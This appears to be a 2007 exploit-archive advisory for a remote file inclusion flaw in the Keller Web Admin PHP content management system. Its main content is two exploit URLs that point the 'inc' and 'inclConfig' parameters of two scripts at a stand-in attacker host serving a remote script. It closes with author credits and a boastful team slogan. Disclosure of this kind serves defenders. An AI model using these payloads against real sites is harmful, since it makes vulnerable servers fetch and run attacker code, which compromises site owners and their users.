Keller Web Admin suffers from a remote file inclusion vulnerability.
3cee7ede1daf0956843c34241f0db0090d06e749e71133dd7a5353c605c47a89
Keller Web Admin Remote File Inclusion Exploit
----------------------|
Release .:2007-10-08:.|
----------------------|
-----------------|
Timeline:17.11.07|
-----------------|
-----|
Info:|
-----|
-----------------------------------------------------------------------------------------|
KWA is an advanced CMS with many functions to explore. Site and content management system|
with PHP implementation.| |
-----------------------------------------------------------------------------------------|
Exploit
--------------------------------------------------------------------------------------|
http://site.net/phpscripting.inc.php?inc=http://evilhost.com/evilscript? |
http://site.net/authcheck.inc.php?inclConfig=http://evilhost.com/evilscript? |
--------------------------------------------------------------------------------------|
--------|
Author :|
--------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member ..."we're not the only ones but we're the best"